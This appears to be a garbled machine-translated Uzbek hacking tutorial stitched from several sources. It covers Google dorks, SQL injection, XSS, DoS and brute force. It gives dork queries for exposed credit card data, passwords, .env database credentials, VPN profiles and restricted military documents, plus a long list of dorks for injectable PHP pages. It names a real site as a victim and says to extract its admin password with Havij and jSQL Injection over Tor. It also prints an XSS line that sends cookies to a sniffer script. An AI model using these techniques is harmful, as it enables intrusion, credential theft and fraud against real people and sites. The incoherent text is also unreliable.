Teri operatori uchun kattaroq qisqa nomga ega versiya takomillashtirildi (barchasi prefiksisiz). Farqi shundaki, allinurl so'zlarning ma'nosini biladi va inurl - ulardan faqat birinchisi. Aks holda, so'rovdagi haqoratomuz so'zlar qat'iy ravishda veb-sahifalarda joylashtirilishi mumkin. Inurl operatori sayt uchun boshqa shunga o'xshash operatorga o'xshaydi - sayt. Birinchisi, shuningdek, hujjatga yuborilgan belgilar ketma-ketligi (masalan, /cgi-bin/) turli xil farqlarga ega bo'lgan komponentlarni qidirish uchun keng qo'llaniladimi yoki yo'qligini bilish imkonini beradi.

Keling, buni amaliy ko'rib chiqaylik. Biz allintext filtrini olamiz va shu tarzda ishlaymiz, kredit kartalarining raqamlari va konvertatsiya kodlari ro'yxatini ko'rganimizdan so'ng, ular uchun muddat ikki yildan kamroq vaqt ichida tugaydi (aks holda, agar ular barcha kreditlarga mos keladigan darajada aqlli bo'lsa).

Allintext: karta raqamining amal qilish muddati /2017 cvv

Agar siz yosh xaker maxfiy ma'lumotlarda yolg'on gapirib, Pentagon yoki NASA serverlariga "buzilgan" haqidagi xabarni o'qigan bo'lsangiz, Google-dan foydalanishning bunday oddiy usuli haqida o'zingizga murojaat qilgan ma'qul. Aytaylik, bizda NASA josuslari ro‘yxati va ularning aloqa ma’lumotlari bor. Albatta, bunday o'xshashlik elektron shaklda. Aniqlik yoki nazorat qilish uchun vinolarni tashkilotning saytida ham topish mumkin. Bu mantiqan, bu munosabat bilan hech qanday jo'natish bo'lmaydi, ichki victoria uchun tayinlash sharob shards. Bunday faylda qanday so'zlar bo'lishi mumkin? Eng kamida - "manzil" maydoni. Perevíriti barcha tsí pripuschenna eng oddiy tarzda.

inurl:nasa.gov fayl turi:xlsx "manzil"

Koristuesya byurokratiyasi

Shunga o'xshash bilim - resepsiyonist. Adolatli tarzda, mustahkam catch veb-xostlar uchun Google operatorlari, juda Merezhya va shukany tuzilishi xususiyatlari haqida batafsil ma'lumot beradi. Tafsilotlarni bilib, siz kerakli fayllarning vakolatlarini osongina filtrlashingiz va aniqlab olishingiz mumkin, shunda siz ma'lumotlarning haqiqiy qiymatini olib tashlashingiz mumkin. Bu yerda byurokratiya yordamga kelgani qiziq. Bu odatiy formulalarni ishlab chiqarish uchun mo'ljallangan, ular uchun siz Merezhga sizib ketgan maxfiy xabarlarni ayyorona pichirlaysiz.

Masalan, AQSh Mudofaa vazirligi ofisidagi obov'yazkovy shtamplarni tarqatish bayonoti hujjatning kengligini standartlashtirilgan almashishni anglatadi. A harfi hech qanday sir bo'lmagan ommaviy nashrlarni anglatadi; B - belgilar ichki viktoriyadan kamroq, C - faqat F gacha bo'lgan qat'iy maxfiydir. X harfi uchun turish ma'qul, bu katta tenglarning suverenitetini o'rnatish uchun ayniqsa muhimdir. Bunday hujjatlarni xizmat tili uchun ishlashi kerak bo'lganlarga hazil qilishsin va biz S harfi bilan fayllarni baham ko'ramiz. Bunday ehtiyotkorlik bilan himoyalangan ma'lumotlarni oshkor qilish AQSh armiyasi uchun ko'rilgan yuqori level.mil domenidagi saytlarda bo'lishi mumkin.

"TARQATILGAN BAJON C" inurl:navy.mil

.mil domenida AQSh Mudofaa vazirligi va boshqa pudratchi tashkilotlarning boshqa saytlari yo'qligi qulayroq. Poshukovning vidach s domenida obmezhennyam barcha yo'l toza chiqib, va sarlavhalar - o'zlari uchun. Rus sirlari darajasiga o'xshash Shukati amalda marno: domenda.

Agar siz .mil domenidagi saytdan biron bir hujjatni hurmat bilan tekshirsangiz, so'rovni aniqlashtirish uchun boshqa belgilardan foydalanishingiz mumkin. Masalan, "Sec 2751" eksport birjasiga yuboriladi, buning uchun siz texnik ma'lumotlarni qo'lda qidirishingiz mumkin. Ba'zan siz rasmiy saytlardan uzoqlashasiz, lekin u yoqilgandan so'ng, turni qidirib, cíkavim xabarlariga kira olmaganlar uchun Google keshini (kesh operatori) yoki Internet arxivi sayti bilan shoshiling.

Biz qorong'ulikdan uzoqlashamiz

Krym vipadkovo hukumat idoralarining hujjatlarini oshkor qildi, Google keshida bir soat davomida Dropbox va boshqa maʼlumotlarni yigʻish xizmatlaridagi maxsus fayllardagi xabarlarni birlashtirib, goʻyo ommaviy eʼlon qilingan maʼlumotlarda “shaxsiy” xabarlarni yaratdi. Muqobil va mustaqil xizmatlar bilan ular yanada yaxshi. Masalan, keyingi qadam marshrutizatorda FTP serveri o'rnatilgan barcha Verizon mijozlarining ma'lumotlarini bilishdir.

allinurl: ftp://verizon.net

Bir vaqtning o'zida qirq mingdan ortiq bunday donishmandlar bo'lgan va 2015 yilning bahorida ularning soni ko'proq edi. Deputat Verizon.net har qanday boshqa provayder nomini taklif qilishi mumkin va kim ma'lum bo'ladi, ular kattaroq ushlashlari mumkin. FTP serveri orqali siz routerga ulangan tashqi xotira qurilmasidagi fayllarni ko'rishingiz mumkin. Masofadan ishlash, shaxsiy g'amginlik yoki tengdoshga fayl yuklab olish uchun tse NAS-ga qo'ng'iroq qiling. Bu burunlarning barchasi Google va boshqa qidiruv tizimlari tomonidan indekslanadi, shuning uchun tashqi disklarda saqlangan fayllarga kirish to'g'ridan-to'g'ri so'rov bilan amalga oshirilishi mumkin.

Konfiguratsiyalarni ko'rib chiqish

Qorong'ilikka ulgurji migratsiyadan oldin, shovishchgacha, oddiy FTP serverlari qadrlangan, ularda ham nomuvofiqliklar mavjud edi. Ulardan ba'zilari tegishli va dosi. Masalan, mashhur WS_FTP Professional dasturida konfiguratsiya, yozuv turi va parollar haqidagi ma'lumotlar ws_ftp.ini faylidan saqlanadi. Uni bilish va o‘qish oson, barcha yozuvlar matn formatida saqlanadi va parollar minimal chalkashliklardan so‘ng Triple DES algoritmi yordamida shifrlanadi. Kattaroq versiyalar uchun birinchi baytni olib tashlash kifoya.

WS_FTP Password Decryptor yordam dasturi yoki qimmat bo'lmagan veb-xizmati yordamida bunday parollarni parolini hal qilish oson.

Saytning yomonligi haqida gapirganda, CMS konfiguratsiya fayllari yoki elektron tijorat uchun qo'shimchalarning jurnallari va zaxira nusxalaridan parolni olib tashlashni talab qiling. Oddiy tuzilmani bilsangiz, kalit so'zlarni osongina kiritishingiz mumkin. Ws_ftp.ini ga o'xshash qatorlar kengroq. Misol uchun, Drupal va PrestaShop tilga xos identifikator (UID) va haqiqiy parolga (pwd) ega va barcha ma'lumotlar extensions.inc fayllaridan yig'iladi. Shukati í̈x quyidagicha amalga oshirilishi mumkin:

"pwd=" "UID=" ext:inc

DBMSda parollarni qulfdan chiqarish

SQL serverlarining konfiguratsiya fayllarida elektron xatlarning nomlari va manzillari tanlangan formatda saqlanadi, parollar esa ularning MD5 xeshlarida yoziladi. Ularni shifrlash, qat'iy ko'rinishda, imkonsiz, prote xesh-parolning o'rta juftliklarining haqiqiyligini bilishi mumkin.

Shu soatgacha DBMS shifrlanmoqda va ba'zi tillarda parol xeshlash mavjud emas. Ulardan har qandayining konfiguratsiya fayllari brauzerda oddiygina ko'rib chiqilishi mumkin.

Intext:DB_PASSWORD fayl turi:env

Windows serverlarida paydo bo'lishi bilan, konfiguratsiya fayllarining joylashuvi ko'pincha ro'yxatga olish kitobi tomonidan ishg'ol qilinadi. Yoga gílkah bo'yicha Shukati fayl turi sifatida bir xil daraja, vikoristovuyuchi reg bo'lishi mumkin. Masalan, eksa:

Fayl turi:reg HKEY_CURRENT_USER "Parol"=

Aniq narsalar haqida unutmang

Yopiq ma'lumotlarga kirish imkoniga ega bo'lgan ba'zi odamlar qo'shimcha vipadkovo vídkritikh ma'lumotlarini qidirishga kirishadi, ular Google shafaqida o'tkazgan. Ideal variant - ba'zi kengaytirilgan formatdagi parollar ro'yxatini bilish. Matn fayli, Word hujjatlari yoki Excel elektron jadvallaridagi qiyshiq yozuvlardan ma'lumotlarni saqlash faqat eng taniqli odamlar tomonidan amalga oshirilishi mumkin, ammo siz ulardan har doim foydalanishingiz mumkin.

Fayl turi: xls inurl: parol

Bir tomondan, shunga o'xshash hodisalarni yo'q qilish uchun juda ko'p koshtivlar mavjud. Htaccess, CMS yamoqlariga tegishli kirish huquqlarini ta'minlash, chap skriptlarni buzmaslik va boshqa dirkilarni burish kerak. Shuningdek, men robots.txt faylidagi xatolar ro'yxati bilan fayldan foydalanaman, u yangi fayl va kataloglarda qidiruv tizimining brauzerlari uchun indekslanadi. Boshqa tomondan, mening serverimdagi robots.txt tuzilishi standartga o'xshab ko'rinar ekan, yangisida qandaydir fokuslar borligi darhol ayon bo'ladi.

Har qanday saytdagi kataloglar va fayllar ro'yxati standart indeks bilan taqdim etiladi. Xizmat maqsadlari uchun Shards sarlavha kiritilgan bo'lishi aybdor, keyin intitle operatori tomonidan qurshov vv qidiruv hissi bor. So'zlar /admin/, /personal/, /etc/ kataloglarida va /secret/ navigatsiyasida joylashgan.

Yangilanishlar ortidan

Bu erda dolzarblik juda muhim: eski nomuvofiqliklar to'g'ri qisqartirilgan, ammo Google va bu yogo Poshukovning vidachlari doimo o'zgarib turadi. Boshqacha qilib aytganda, "qolgan soniyada" (&tbs=qdr:s, masalan, so'rovning URL manzili) va "real vaqtda" (&tbs=qdr:1) filtri o'rtasida harakatlaning.

Google faylining qolgan yangilanish sanasi uchun vaqt oralig'i ham bilvosita ko'rsatilgan. Grafik veb-interfeys orqali siz odatdagi davrlardan birini (yil, kun, kun va hokazo) tanlashingiz yoki sana oralig'ini belgilashingiz mumkin, aks holda bu usul avtomatlashtirish uchun mos emas.

Manzil qatoriga qarab, &tbs=qdr: qo'shimcha konstruktsiyasidan natijalarni olish yo'li haqida faqat taxmin qilish mumkin. Undan keyingi y harfi bir martalik chegarani belgilashi kerak (&tbs=qdr:y), m oyning qolgan qismi uchun natijalarni, w - hafta uchun, d - oxirgi kun uchun, h - qolgan vaqtni ko'rsatadi. yil, n - qish uchun va s - menga bir soniya bering. Googlega tanish boʻlgan eng soʻnggi natijalar qoʻshimcha &tbs=qdr:1 filtri bilan mashhur.

Agar sana oralig'i Google-da Julian formatida daterange operatori orqali o'rnatilganligini bilsangiz, qiyin skript yozish kerak. Misol uchun, shu tarzda siz 2015 yil 1 kundan 1 kungacha maxfiy so'zli PDF hujjatlari ro'yxatini bilishingiz mumkin.

Maxfiy fayl turi: pdf sana diapazoni: 2457024-2457205

Diapazon Julian sanasi formatida kasr qismini tuzatmasdan ko'rsatilgan. Ularni Grigorian taqvimidan qo'lsiz qo'lda tarjima qiling. Sana o'zgartirgichdan foydalanish osonroq.

Maqsadli va yana filtrlash

Krím vkazívki dodatkovykh operíví, poshkovomu í̈x í̈x u tílí silaannya bevosita nadsilati mumkin. Masalan, filetype:pdf ning aniqlanishi as_filetype=pdf konstruktsiyasini o'z ichiga oladi. Bunday martabada, uni engilroq qo'ying, aniq bo'lsin. Natijalarni hisobga olgan holda, faqat Gonduras Respublikasidan, qidiruv tizimiga URL qurilishi cr=countryHN va hatto Bobruisk shahridan - gcs=Bobruisk qo'shilishi mumkin. To'liq ro'yxatni chakana sotuvchilarda topishingiz mumkin.

Google kliklarini avtomatlashtirish narxi hayotni osonlashtiradi, lekin ko'pincha muammolarni keltirib chiqaradi. Masalan, WHOIS orqali koristuvachning IP manzili xuddi shu joyga tayinlangan. Google-ga ma'lumot yuborilganda, serverlar o'rtasidagi behudalik nafaqat muvozanatlashadi, balki qidiruv natijalarining natijalari ham o'zgaradi. Hudud uchun, xuddi shunday talab bilan, birinchi tomondan, turli natijalarni isrof qilish yaxshi va ularning ba'zilari tiqilib qolishi mumkin. Kosmopolitdan xabardor bo'ling, deb shukati ma'lumot s be-yakoy kraíni dvolíterny kod direktivasi gl = mamlakat keyin. Misol uchun, Gollandiyaning kodi NL, Google'dagi Vatikan va Pivnichny Koreya o'z kodini qo'ymagan.

Ko'pincha, Poshukovning vidachi kiritilgan filtrlarning g'alabali sonidan keyin urilgan ko'rinadi. Bunday vipadka yordamida yangisiga o'chirish tugmachasini qo'shish orqali suv ta'minotini aniqlashtirish oson (terining oldiga minus qo'yiladi). Misol uchun, so'z bilan Shaxsiy, bank , nomlar í tutorial . Buning uchun sof qidiruv natijalari darslik so'rovini emas, balki tushuntirishlarni ko'rsatadi:

Sarlavha:"Index of /Personal/" -nomlar -o'quv qo'llanma -banking

Qolganlarga

Axborot xakeri o'zi kerak bo'lgan hamma narsani o'zi hal qilishi uchun javobgardir. Misol uchun, VPN - bu qulay narsa, lekin u qimmat, aks holda bu timchasova va s obezhennyami. Faqat o'zingiz uchun obuna bo'lish ko'rinmaydi. Yaxshi, guruh obunalari nima va Google yordami bilan guruhning bir qismiga aylanish oson. Kim uchun Cisco VPN konfiguratsiya fayliga kirish mumkin, kim uchun nostandart PCF kengaytmasi va vídomiy slyakhga kirish mumkin: Program Files \ Cisco Systems \ VPN Client \ Profiles . Bitta iltimos, va siz, masalan, Bonn universitetining do'stona jamoasiga qo'shilasiz.

Fayl turi: pcf vpn YOKI Guruh

MA'LUMOT

Parollar shifrlangan ko'rinishdan saqlanadi, lekin Moris Massard allaqachon shifrni ochish uchun dastur yozgan va u thecampusgeeks.com orqali bepul.

Yuzlab turli xil hujumlar va penetratsion testlar Google yordamini kutmoqda. Ommabop dasturlar, ma'lumotlar bazalarining asosiy formatlari, PHP ning raqamli nomuvofiqligi, do'zax va boshqalar uchun variantlar mavjud emas. Shivirlayotganlarni aniq aniqlash uchun kerakli ma'lumotlarni so'rash kerak (ayniqsa tíêí̈, chunki ular g'ayrioddiy hammomlarda ishlashni rejalashtirmaganlar). G'oyalar bilan yashash uchun yagona Shodan emas, balki merezhevyh resurslarini indekslash uchun asos bo'ling!

Men axborot xavfsizligi haqida bir necha so'z yozdim. Maqola dasturchilar-boshlovchilar va endigina Frontend-rozrobkoy bilan shug'ullana boshlaganlar uchun tegishli bo'ladi. Qanday muammo mavjud?

Ko'pgina chakana sotuvchilar-pochatkivtsiv yozma kod haqida shunchalik bezovta bo'lishadiki, ular robotlarining xavfsizligini unutishadi. Va yana ahmoqona narsa - SQL, XXS so'rash kabi nomuvofiqliklarni unuting. Shuningdek, ular o'zlarining ma'muriy panellari uchun oson parollarni yaratadilar va qo'pol kuchga duchor bo'lishadi. Ularga qanday hujumlar qilishingiz mumkin?

SQL in'ektsiyasi

SQL in'ektsiyasi ma'lumotlar bazasiga hujumning eng keng tarqalgan turi bo'lib, u ma'lum bir ma'lumotlar bazasi uchun SQL so'rovi paytida sodir bo'ladi. Ko'p odamlar bunday hujumlardan aziyat chekmoqda va buyuk kompaniyalar qurishadi. Sababi, sotuvchining ma'lumotlar bazasini va SQL so'rovlarini yozish soati uchun kechirimi.

SQL so'rovlarida mavjud bo'lgan kirish ma'lumotlarini noto'g'ri qayta ishlash orqali SQL blokirovkasi turiga hujum qilish mumkin. Xakerning uzoqdan hujumi bilan siz nafaqat bir nechta ma'lumotlar bazalarini, balki parollar va ma'muriy panel jurnallarini ham sarflashingiz mumkin. Va bu ma'lumotlar etarli bo'ladi, shuning uchun men saytni qayta tiklayman yoki yangisiga muzokaralarsiz tuzatishlar kiritaman.

Hujum PHP, ASP, Perl va boshqa tillarda yozilgan skriptlarda muvaffaqiyatli amalga oshirilishi mumkin. Bunday hujumlarning muvaffaqiyati ko'proq DBMS qanday mag'lubiyatga uchraganiga va skriptning o'zi qanday amalga oshirilganiga bog'liq. Dunyoda SQL-ín'êktsíy uchun juda ko'p turli xil saytlar mavjud. Chiomu bilan kesishish oson. Turli saytlarni qidirishni so'rash uchun maxsus so'rovlar - "yo'llar" ni joriy qilish kifoya. Ulardan ta'sir o'qi:

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?category=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:pageid=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

Qanday qilib ular haqida shov-shuv ko'tarish kerak? Ularni Google qidiruv tizimiga yoki Yandex-ga kiritish kifoya. Poshukovikda siz nafaqat mos kelmaydigan saytni, balki boshqa tomondan bir xil nomuvofiqlikni ko'rishingiz mumkin. Alemy, biz chomu zupinyatisya va perekonayemosya ustida bo'lmaymiz, haqiqatning scho tomoni g'azablantiradi. Qaysi qiymat uchun "id = 1" etarli bo'lsa, bitta oyoqni "'" qo'ying. Xuddi shunday:

• inurl:games.php?id=1'

I saytida biz SQL so'rovi haqida kechirim ko'ramiz. Bizning xakerimizga nima kerak edi?

Va unga afv bilan yon tomonga xat yuborish zaruriyatini berdi. Keling, birinchi qismdan boshlab "Kali linux" tarqatish to'plamidagi muhitning uning yordamchi dasturlari bilan nomuvofiqligi ustida ishlaylik: ko'rsatma kodini amalga oshirish va zarur operatsiyalarni amalga oshirish. Bu qanday bo'ladi, men sizga ayta olmayman. Ammo bu haqda Internetda ma'lumot topishingiz mumkin.

XSS hujumi

Ushbu turdagi hujum cookie-fayllarga ta'sir qiladi. Їx, o'z yuragingizda koristuvachlarni saqlash va saqlashni yaxshi ko'rasiz. Nega yo'q? Ularsiz-chi? Aje Zavdyaki Cookies biz Vk.com va Mail.ru dan yuz marta parolni haydamaymiz. Va ular tomonidan boshqariladigan kam jim. Ammo Internetda xakerlar uchun ko'pincha qoida mavjud: muvaffaqiyat darajasi xavfsizlik omiliga to'g'ridan-to'g'ri proportsionaldir.

XSS hujumini amalga oshirish uchun bizning xakerimiz JavaScript-ni bilishi kerak. Bir qarashda Mova juda oddiy va kompyuter resurslariga kira olmaydiganlar uchun shkidliva emas. Pratsyuvati z JavaScript hacker faqat brauzerda mumkin, bir oz ko'proq etarli. Aje smut veb tomonida kodni kiriting.

Hujum jarayoni haqida batafsil gapirmayman. Rozpovim qanday ko'rinadi tuyg'uning asosidan kamroq.

Xaker JS kodini forum yoki mehmonlar kitobiga qo'shishi mumkin:

Skriptlar bizni infektsiyalangan tomonga yo'naltiradi, u erda kod olinadi: u sniffer, to'plam yoki ekspluatatsiya bo'ladimi, aks holda bizning cookie-fayllarimiz keshdan o'g'irlanadi.

Nima uchun JavaScript-ning o'zi? Chunki JavaScript veb-so'rovlar bilan yaxshi ishlaydi va cookie-fayllarga kira oladi. Ammo agar bizning skriptimiz bizni biron bir saytga o'tkazsa, uni eslab qolish oson. Darhol, hacker zastosovuê ayyor variant - rasmdagi kodni kiritish kifoya.

Img=newImage();

Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

Biz shunchaki skriptimiz manzili sifatida sizga tegishli tasvirni yaratmoqdamiz.

Qanday qilib o'zingizni nimadan qutqarishingiz mumkin? Bu oddiyroq - shubhali xabarlarga bormang.

DoS va DDos hujumlari

DoS (Ingliz tilidan Deial of Service - Vídmova v oblugovuvanní) - vídmovi-ga olib kelish usuli bilan hisoblash tizimiga xakerlik hujumi. Bunday aqllarning yaratilishi, qandaydir summativ tizimlar uchun tizim resurslariga (serverlarga) kirishni ololmaydi, ammo kirish qiyin. Vídmova tizimlari croc bo'lishi mumkin vv zakhoplennya, yakscho tasodifiy vaziyatda PZ tanqidiy ma'lumot yoki yo'qligini ko'radi: masalan, versiya, dastur kodining bir qismi va ín. Ammo iqtisodiy bosim dunyosining eng yaxshi qismi: daromad keltiradigan oddiy xizmat narxi. Provayderdan Rakhunki yoki hujumga kiraverishda kirib, ichakning "o'lchovi" ni aniq ko'rishingiz mumkin. Bu soatda DoS va DDoS hujumlari eng ommabop hisoblanadi, chunki ular hech qanday qonuniy ahamiyatga ega dalillarni qoldirmasdan butun tizimni amaliyotga tatbiq etish imkonini beradi.

DoS DDos hujumlaridan nimasi bilan farq qiladi?

DoS hujumi, oqilona tarzda so'ralgan. Misol uchun, agar server kirish paketlarining to'g'riligini tekshirmasa, xaker bunday so'rovni yaratishi mumkin, u abadiy qayta ishlanadi va boshqa zadnannyami bilan ishlash uchun protsessor soatidan foydalanmang. Shubhasiz, mijozlar xizmatga g'amxo'rlik qilishadi. Ale perevantazhit abo borish emas, balki katta vydomí saytlar uchun bunday yo'l bilan ohangda olish. Ular yerda keng ko‘lamli kanallar va yuqori bosimli serverlarga ega, shuning uchun ular hech qanday muammosiz bunday siljishlarni engishlari mumkin.

DDoS aslida DoS bilan bir xil hujumdir. DoS-da bitta paket so'ralgan bo'lsa-da, DDoS-da yuzlab yoki undan ko'p bo'lishi mumkin. Navit navitzhní server va bunday korxonalar yo'lida olish mumkin emas. Men sizga bir misol keltiraman.

DoS hujumi - agar siz rozmovu z kimosini boshqarayotgan bo'lsangiz, lekin keyin siz go'yo odam kishansiz bo'lib, baland ovoz bilan baqira boshlagandek kelasiz. Kim bilan harakat qilish mumkin emas yoki bu mumkin emas yoki undan ham murakkabroq. Qaror: qo'lga olingan shaxsni ishontirish uchun himoyaga chaqiring. DDoS-hujumlar - agar NATOda bunday qabih odamlar minglab bo'lsa. Bunday kayfiyatda himoyani burish va yo'qotish mumkin.

DoS va DDoS zombi deb ataladigan kompyuterlardan yaratilgan. Tse xakerlari koristuvachlarning kompyuterlarini buzishdi, shuning uchun ularning mashinasi bunday server hujumida ishtirok etayotganiga shubha qilmaydi.

Qanday qilib o'zingizni bir víd tsgogo saqlashingiz mumkin? Bo'lishi mumkin emas. Ale, siz xaker uchun ishlarni osonlashtirishingiz mumkin. Kim uchun qattiq serverlar bilan yaxshi hosting tanlash kerak.

Qo'pol kuch hujumi

Rozrobnik hujum qilish uchun ko'plab tizimlarni ko'rib chiqishi, biz yozgan skriptlarni tez-tez ko'rib chiqishi, nomuvofiqlik mavjudligini tekshirishi va hokazo. Va agar siz saytning qolgan qismiga o'tmoqchi bo'lsangiz va administrator paneliga shunchaki parol qo'ysangiz, bitta so'zni unutishingiz mumkin. Parol!

Oddiy parol o'rnatish qat'iyan tavsiya etilmaydi. Siz 12345, 1114457, vasya111 va boshqalarni ishlatishingiz mumkin.10-11 belgidan kam parol o'rnatish tavsiya etilmaydi. Aks holda, siz eng keng tarqalgan va noqulay hujumni tan olishingiz mumkin - Brute Force.

Qo'pol kuch - bu turli xil maxsus dasturlardan lug'at uchun parolga qo'pol kuch hujumi. Lug'atlar har xil bo'lishi mumkin: lotin alifbosi, raqamlar uchun qo'pol, keling, ma'lum bir diapazongacha deylik, o'zgartiring (lotin + raqamlar) va noyob belgilar bilan lug'atlarni kezing @#4$%&*~~`'”\ ? bu ichida.

Shubhasiz, bunday hujumni yo'q qilish oson. Dosit vigadati katlanadigan parol. Sizni captcha bilan aldashingiz mumkin. Va shuningdek, agar sizning saytingiz CMS-da buzilgan bo'lsa, unda ularning ko'pchiligi shunga o'xshash hujum turini hisoblaydi va IP-ni bloklaydi. Parolda ko'proq turli xil belgilar mavjudligini yodda tutish kerak, tanlash uchun yogodan ko'ra muhimroqdir.

Xakerlarni qanday mashq qilish kerak? Ko'pincha ular shubhalanadilar yoki parolning bir qismini bilish juda kech. Koristuvach paroli, albatta, 3 yoki 5 ta belgidan iborat emas, deb taxmin qilish yanada mantiqiyroq. Bunday parollarni qisman yomonliklarga kamaytirish mumkin. Asosan, xakerlar 5 dan 10 gacha belgilar oralig'ini oladi va unga bir nechta belgilar qo'shadi, shunda ular buni oldindan bilishadi. Dali kerakli diapazonlardan parollar yaratadi. Kali linux-ning tarqatilishida bunday o'zgartirishlar uchun dasturlar mavjud. Va voila, hujum endi trivatime uzoq emas, chunki lug'at allaqachon unchalik katta emas edi. Ungacha, xaker video kartaning qattiqligini zadíyati mumkin. deyakí í̈x CUDA tizimini qo'llab-quvvatlaydi va ularning qo'pol kuchi 10 baravarga oshadi. Í eksa mi bachimo, shunday oddiy tarzda hujum butunlay real ekanligini. Yosh qo'pol kuch faqat saytlarga bo'ysunmaydi.

Hurmatli chakana sotuvchilar, axborot xavfsizligi tizimi haqida unutmang, hatto bugungi kunda ham bunday turdagi hujumlar oldida kam odam, zokrema va kuchlar jabr ko'radi. Aja eng katta janjal - bu odam, qoida tariqasida, siz bu erda bo'lishingiz mumkin, yoki siz buni bu erda ko'ra olmaysiz. Biz dasturchilarmiz, lekin dasturlashtirilgan mashinalar emas. Ma'lumotlarning yo'qolishi jiddiy oqibatlarga olib kelsa ham, hushyor bo'ling!

Shunday qilib, bugun men sizga hech qanday maxsus ma'lumotga ega bo'lmagan holda yovuz bo'lganlar haqida gapirib beraman. Men sizga aytaman, bu etarli emas, lekin hammasi bir xil.
Boshlash uchun siz saytlarning o'zlarini bilishingiz kerak. Kim uchun google.com saytiga boring va yo'l bo'ylab yuring

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= men nurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl : prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view . php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= url:mavzuda. php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transkript. php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2. php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql. php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4? id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl: look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

eksa kichik ro'yxatdir. Siz o'zingiznikiga kafolat bera olasiz. Otzhe, biz saytni bilardik. Masalan, http://www.vestitambov.ru/
Keling, ushbu dasturni yuklab olamiz

**Yashirin kontent: Kontent kontenti uchun postlar soni 3 yoki undan ko‘p bo‘lishi kerak.**

Tisnemo OK. Keyin jabrlanuvchining saytini joylashtiramiz.
Tisnemo boshlanishi. Dali natijalarni tekshiradi.
Shunday qilib, dastur SQL farqini bilardi.

Daly yuklab Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= insert otrimane posilannya tudi. Havijni qanday kutib olishni tushuntiring va yuklab olmayman, yoga bilish muhim emas. Mo'ylov. Siz kerakli ma'lumotlarni - administrator parolini olib tashladingiz, o'ng tomonda esa bu sizning tasavvuringiz.

P.S. Men yozishga birinchi urinishim. Nima bo'ldi, deb qichqiryapman

Faylni ustiga bosish orqali ishga tushiring (virtual mashinani talab qiladi).

3. SQL-ín'êktsííí saytni qayta tekshirish uchun bir soatlik anonimlik

Kali Linux-da Tor va Privoxy-ni o'rnatish

[Chakana sotuvchida tarqatilgan]

Windows-da Tor va Privoxy-ni o'rnatish

[Chakana sotuvchida tarqatilgan]

JSQL Injection-da proksi-serverlar orqali robotlarni sozlash

[Chakana sotuvchida tarqatilgan]

4. Saytni SQL-ín'êktsííí z jSQL Injection-da qayta tekshirish

Dastur bilan ishlash yanada sodda. Buning uchun sayt manzilini kiritish va ENTER tugmasini bosish kifoya.

Keyingi skrinshotda siz saytda uchtagacha SQL-infektsiyalari mavjudligini ko'rishingiz mumkin (ular haqida ma'lumot pastki o'ng burchakda ko'rsatilgan). In'ektsiya nomini bosish orqali siz siqish usulini o'zgartirishingiz mumkin:

Bundan tashqari, bizga allaqachon ma'lumotlar bazasi ko'rsatilgan.

